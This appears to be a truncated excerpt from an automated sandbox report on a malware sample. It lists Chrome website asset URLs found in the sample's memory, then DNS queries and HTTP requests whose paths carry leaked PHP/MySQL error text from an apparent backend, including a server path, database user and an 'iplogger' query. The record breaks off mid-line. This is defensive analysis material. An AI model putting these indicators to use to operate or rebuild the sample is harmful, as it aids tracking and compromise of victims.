Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.444765684.0000000004168000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.539292331.0000000004297000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.507782111.0000000005120000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.h
Source: d.3.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.433380405.0000000004428000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.438159484.0000000004428000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.309693330.00000000043B7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529060873.000000000419F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.306370391.00000000043D1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.541938314.0000000004457000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532721999.0000000004231000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532677562.000000000422F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532700118.0000000004230000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.310062566.00000000043B7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.532744009.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391617125.0000000004368000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.387883924.000000000412E000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500167271.0000000004208000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.393146806.0000000004371000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.393648613.0000000004368000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403791587.0000000004301000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.395567700.0000000004369000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.395593036.000000000436F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js

Source: unknown

DNS traffic detected: queries for: www.facebook.com

Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: www.facebook.com
Source: global traffic	HTTP traffic detected: GET 